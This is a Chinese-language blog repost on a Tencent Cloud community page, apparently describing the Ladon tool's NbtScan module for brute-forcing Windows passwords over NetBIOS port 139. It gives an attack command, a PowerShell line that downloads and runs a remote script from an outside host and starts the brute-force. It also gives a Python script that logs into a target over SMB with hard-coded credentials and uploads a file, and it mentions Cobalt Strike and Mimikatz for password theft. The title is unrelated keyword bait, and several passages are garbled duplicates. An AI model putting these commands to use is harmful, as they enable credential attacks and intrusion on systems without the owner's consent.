前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >h3c bios密码_日本服务器ip端口密码

h3c bios密码_日本服务器ip端口密码

作者头像
全栈程序员站长
发布2022-11-07 10:32:57
1.6K0
发布2022-11-07 10:32:57
举报
文章被收录于专栏:全栈程序员必看

版本

Ladon >= 7.1

139端口

NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows”文件和打印机共享”和SAMBA。

IPC$通信

Windows系统中的net use ipc 整 个 通 信 过 程 , 先 445 − > 137 − > 139 验 证 , 当 你 开 启 防 火 墙 禁 用 445 , 发 现 系 统 命 令 就 无 法 连 接 I P C 了 , 根 本 没 机 会 走 到 139 , 所 以 使 用 系 统 自 带 命 令 连 接 的 i p c 整个通信过程,先445->137->139验证,当你开启防火墙禁用445,发现系统命令就无法连接IPC了,根本没机会走到139,所以使用系统自带命令连接的ipc 整个通信过程,先445−>137−>139验证,当你开启防火墙禁用445,发现系统命令就无法连接IPC了,根本没机会走到139,所以使用系统自带命令连接的ipc需要同时开启这些端口。说入侵139就是IPC 的 说 法 是 错 误 的 , 就 像 说 w m i e x e c . v b s 可 完 全 替 代 P S E X E C 工 具 一 样 , 这 个 脚 本 需 要 目 标 开 启 135 和 445 , 因 为 它 通 过 445 来 传 输 结 果 , 意 味 着 目 标 只 开 放 135 这 个 V B S 的 回 显 就 没 有 了 , 其 实 假 设 目 标 只 开 放 445 , 这 个 V B S 脚 本 还 能 执 行 命 令 吗 ? 哪 来 的 替 代 或 扔 掉 ? 这 个 系 统 的 I P C 的说法是错误的,就像说wmiexec.vbs可完全替代PSEXEC工具一样,这个脚本需要目标开启135和445,因为它通过445来传输结果,意味着目标只开放135这个VBS的回显就没有了,其实假设目标只开放445,这个VBS脚本还能执行命令吗?哪来的替代或扔掉?这个系统的IPC 的说法是错误的,就像说wmiexec.vbs可完全替代PSEXEC工具一样,这个脚本需要目标开启135和445,因为它通过445来传输结果,意味着目标只开放135这个VBS的回显就没有了,其实假设目标只开放445,这个VBS脚本还能执行命令吗?哪来的替代或扔掉?这个系统的IPC连接也是同理,测试首先得把其它端口禁了再说话。虽然系统自带命令需要同时开启,但是 自己实现SMB服务器的话是可以只使用139或只用445端口的,详情参考impacket。

Nbt爆破

系统自带命令需要同时开启139和445,但是 自己实现SMB服务器的话是可以只使用139或只用445端口的。系统的IPC 就 像 读 取 系 统 密 码 一 样 , 可 以 先 植 入 C S 再 用 M I M I 插 件 读 取 , 但 是 我 们 也 可 以 不 使 用 C S , 直 接 M I M I 读 取 密 码 啊 。 基 于 和 M I M I 可 以 独 立 读 取 密 码 的 原 理 , 反 向 思 路 我 们 也 可 以 完 全 不 走 445 , 直 接 通 过 139 验 证 W I N D O W S 密 码 , 所 以 这 个 和 I P C 就像读取系统密码一样,可以先植入CS再用MIMI插件读取,但是我们也可以不使用CS,直接MIMI读取密码啊。基于和MIMI可以独立读取密码的原理,反向思路我们也可以完全不走445,直接通过139验证WINDOWS密码,所以这个和IPC 就像读取系统密码一样,可以先植入CS再用MIMI插件读取,但是我们也可以不使用CS,直接MIMI读取密码啊。基于和MIMI可以独立读取密码的原理,反向思路我们也可以完全不走445,直接通过139验证WINDOWS密码,所以这个和IPC不一样(指的是系统命令连接的ipc),所以为了防止大家误解,起名为NbtScan。毕竟走的也是Netbios,系统IPC$验证一是时间非常久,且必须开启445,如果445都开了为何不用SmbScan验证密码呢?但是由于近几年勒索病毒横行,可能很多机器默认会关闭445,所以会导致无法通过445验证密码,但是没关系还有139啊。

Ladon

139端口 Netbios密码爆破(Windows)

Ladon 192.168.1.8/24 NbtScan

image
image

PowerLadon

远程加载NbtScan 139端口弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon7.1_all.ps1’); Ladon 192.168.1.141 NbtScan”

139传输文件

代码语言:javascript
复制
#!/usr/bin/env python
#coding:utf-8
from smb.SMBConnection import SMBConnection
from nmb.NetBIOS import NetBIOS
import os,sys
def getBIOSName(remote_smb_ip, timeout=30):
try:
bios = NetBIOS()
srv_name = bios.queryIPForName(remote_smb_ip, timeout=timeout)
except:
print >> sys.stderr, "Looking up timeout, check remote_smb_ip again!!"
finally:
bios.close()
return srv_name
serverip='192.168.1.40'
conn = SMBConnection('k8gege', 'k8gege520', 'C$',getBIOSName(serverip)[0], use_ntlm_v2 = True) 
assert conn.connect(serverip, 139)
#temdir='/'
#dir=os.path.join('/','public')
f = open('C:/123.txt', 'rb')
conn.storeFile('Users','234.txt',f)
f.close()

工具下载

最新版本:https://k8gege.org/Download 历史版本: https://github.com/k8gege/Ladon/releases

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/184302.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年10月9日 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 版本
  • 139端口
  • IPC$通信
  • Nbt爆破
  • Ladon
    • 139端口 Netbios密码爆破(Windows)
    • PowerLadon
      • 远程加载NbtScan 139端口弱口令爆破
      • 139传输文件
      • 工具下载
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档